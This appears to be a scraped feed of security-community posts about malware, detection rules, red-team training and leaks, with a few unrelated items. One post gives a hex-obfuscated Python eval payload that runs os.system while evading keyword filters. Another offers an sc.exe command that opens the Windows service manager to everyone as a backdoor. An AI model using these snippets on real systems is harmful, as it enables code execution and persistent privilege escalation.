This is the content I came to Internet for: designedbycave.co.uk/2020/LEGO-Inte…

#Malware #Stealer #Panel #Source #PurpleWave Update from 3 August 2020. SpreadLast.exe: virustotal.com/gui/file/a3714… app.any.run/tasks/fecac8c9… purplewave_panel.rar: virustotal.com/gui/file/c8496… GitHub: github.com/3xp0rt/PurpleW… x.com/3xp0rtblog/sta…

Calling eval without "eval" or "import" amongst others: __builtins__.__dict__['\x65\x76\x61\x6C']("\x5F\x5F\x69\x6D\x70\x6F\x72\x74\x5F\x5F\x28\x22\x6F\x73\x22\x29\x2E\x73\x79\x73\x74\x65\x6D\x28\x22" + "COMMAND" + "\x22\x29")

Oops..🤣🤣

Sigma rules for #CobaltStrike detection - fresh and updated rules - let's hunt these suckers down 🍼🤘 NamedPipes github.com/SigmaHQ/sigma/… Process injection / hollowing github.com/SigmaHQ/sigma/… Service installations github.com/SigmaHQ/sigma/…

Se o Raidforum e Pastebin cair... Como algumas empresas de Intel vão colocar medo em seus clientes? rsrsrs #FUD

Recorded a video demonstration explaining hunting of memory artefacts from the stack of a process. It also explains how the Stack as well as Heap can be encrypted during runtime to avoid memory analysis with #BRc4 v1.2 youtu.be/eK9f7VpptV8

Here we go! Pre-sale of RTO: MalDev Advanced (Vol.1) is now open Pre-sale end: Sep 27th Course release date: Sep 28th Userland rootkit tech, building MSVC COFFs, custom "RPC" instrumentation and more... You can't miss it! institute.sektor7.net/rto-maldev-adv1 #RTO #redteam #onlinelearning

Need an almost invisible, post-exploitation, persistent, fileless, LPE backdoor? There are many, but this one looks really beautiful for me: type "sc.exe sdset scmanager D:(A;;KA;;;WD)" from an elevated command prompt.

We've integrated the hashes of the vuln/mal drivers maintained in the LOLDrivers project by The Haag™ Jose Enrique Hernandez in the rule set used by the FREE THOR Lite Hash IOCs github.com/Neo23x0/signat… LOLDrivers loldrivers.io

Active Directory Security » Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia... adsecurity.org

Omarchy 2.0 is ready!! New ISO, AUR-free installation, Chrome micro-fork, Starship prompt, new icon, and 400 other changes from 45 committers 🤘 github.com/basecamp/omarc…

Drama unfolding in Brazil right now where it was discovered a popular and trending Lesbian Dating App was vibe coded Turns out all you need to do is a GET request and you can pull everything

I'm glad this was debunked fast because holy shit.

Over the last 12 months, watchTowr Labs uncovered thousands of leaked credentials: cloud keys, AD creds, API tokens, even KYC data - already being abused. Join us on our journey into “innocent” developer tools. labs.watchtowr.com/stop-putting-y…

GitHub - clivoa/awesome-security-feeds: awesome security feeds github.com/clivoa/awesome…